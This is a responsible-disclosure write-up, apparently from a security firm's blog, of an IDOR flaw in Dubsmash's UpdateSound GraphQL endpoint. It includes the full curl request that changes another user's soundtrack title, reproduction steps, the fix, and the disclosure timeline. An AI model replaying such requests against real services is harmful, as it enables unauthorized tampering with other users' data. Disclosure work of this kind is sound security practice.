How I was able to change Reddit acquired Dubsmash’s music library sound tracks.

This is being published with the permission of Reddit under the responsible disclosure policy.
Sandeep Hodkasia

Sandeep Hodkasia

December 7, 2021

Background:

Dubsmash, initially released in 2014, is a New York-based video-sharing social media service application for iOS and Android. On December 13, 2020, Reddit announced it had acquired Dubsmash.
Dubsmash allows users to videotape themselves while lip-syncing over soundtracks including sections of songs, movies, and famous quotes. Users have the option to select soundtracks from a vast music library that is managed by Dubsmash. Users can also upload their soundtracks to the application.

 

Vulnerability Description:

 

During the security research on the Dubsmash iOS application, I found that the UpdateSound graphql API endpoint was vulnerable to Broken Object Level Authorization security vulnerability.  Broken Object Level Authorization (BOLA) occurs when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability, attackers can bypass authorization and access resources in the system directly. It is generally referred to as an insecure direct object reference or IDOR.

The application server failed to check if the supplied ‘uuid’ parameter value in the UpdateSound graphql API endpoint belongs to the logged-in user or not. Benefitting from this security vulnerability, the attackers would have been able to change any soundtrack’s title using the soundtrack UUID. Soundtrack UUID is publicly known.

Original Report Link: https://hackerone.com/reports/1102365

Vulnerable Request:

curl -i -s -k -X $'POST' \-H $'Host: gateway-production.dubsmash.com' -H $'X-Dmac: ' -H $'X-Remote-Config-Values: []' -H $'X-Time: 1613158267' -H $'User-Agent: Dopesmash/5.20.0 (com.mobilemotion.dubsmash; build:45431; iOS 14.0.1) Alamofire/5.4.0' -H $'X-Accept-Content-Language: en_IN' -H $'X-Device-Timezone: 19800' -H $'X-Device-Language: en' -H $'X-Device-Country: IN' -H $'X-Build-Number: 45431' -H $'Content-Length: 676' -H $'X-App-Version: 5.20.0' -H $'X-Platform: ios' -H $'Connection: close' -H $'Authorization: Bearer XXXXXX' -H $'X-Dubsmash-Device-Id: 0675382B-668E-4EB7-8313-ED96BC132DC9' -H $'Accept-Language: en-IN;q=1.0, hi-IN;q=0.9' -H $'Accept: application/json' -H $'Content-Type: application/json' -H $'X-Dmac-Version: 2' -H $'If-None-Match: W/\"88-IVjhmW06Njcacim4nwHnJNviYsE\"' \-b $'cfduid=' \--data-binary $'{\"query\":\"mutation UpdateSound($input: UpdateSoundInput!) {\n updateSound(input: $input) {\n typename\n sound {\n typename\n ...SoundFragment\n }\n }\n}\nfragment SoundFragment on Sound {\n typename\n uuid\n created_at\n sound\n name\n waveform_raw_data\n liked\n soundStatus: status\n creator {\n typename\n ...ContentCreatorFragment\n }\n share_link\n num_likes\n num_videos\n}\nfragment ContentCreatorFragment on User {\n typename\n username\n uuid\n date_joined\n followed\n has_invite_badge\n badges\n profile_picture\n}\",\"variables\":{\"input\":{\"uuid\":\"a687eb61ad814a09a8a85cedef7837f3\",\"name\":\"test12355556777\"}}}' \$'https://gateway-production.dubsmash.com/graphql?build_number=45431&platform=ios'

 

Steps to Reproduce:

 

  1. Uploaded a sound track in Dubsmash iOS app under ‘My Sounds’ section.
  2. Edited the Sound title and captured the vulnerable graphql HTTP request in the burp suite.
  3. Changed the ‘uuid’ parameter value with some another sound track’s uuid. Sound track UUID is disclosed in the response of multiple API.
  4. Forwarded the request to the server. The sound track title was changed.

Impact:

The attacker would have been able to change any soundtrack’s title using the soundtrack UUID as it is publicly known. Moreover, it was possible to change the entire music library soundtracks’ titles using an automated script.

 

Recommended Fix:

I’ve recommended implementing an authorization check on the ‘uuid’ parameter of the vulnerable UpdateSound API endpoint. This is done by verifying the ‘uuid’ parameter value with the logged-in user session token on the server-side.

Timeline:

 

13 Feb, 2021: Report submitted on Reddit’s bug bounty program
22 Feb, 2021: Reddit’s security team requested for more information
22 Feb, 2021: I’ve shared additional details with the Reddit’s security team
24 Feb, 2021: Reddit’s security team Triaged the submission
1 Mar, 2021: Reddit’s team confirms issue resolution and rewarded $3000 in bounty

Share this

AppSecure helped more than 200+ companies across the globe in protecting their customers' data and business.

Get in touch with us today

Recommended Articles

Security

Securing Your Application with Firewall: A Comprehensive Guide to Using Cloudflare WAF

Discover how to fortify your application’s defenses with our comprehensive guide to leveraging Cloudflare WAF for enhanced security.
May 06, 2024

Read more

Secure-Your-application-with-firewall - Appsecure-security

Security

Secure Your Auth0 Authentication: Deep Dive into Auth0 Best Security Practices

Read more

Auth0 Best Security Practices by Appsecure Security | appsecure.security | Penetration Testing Company

Transform your company's security landscape with our cutting-edge 2023 insights.

Enhance your security with our expertly crafted checklist by top security engineers.

Fortify your defenses with the world’s top leading cybersecurity company

Thank you!

We have received your request, We’ll get back to you in less than 24hours

Back to Home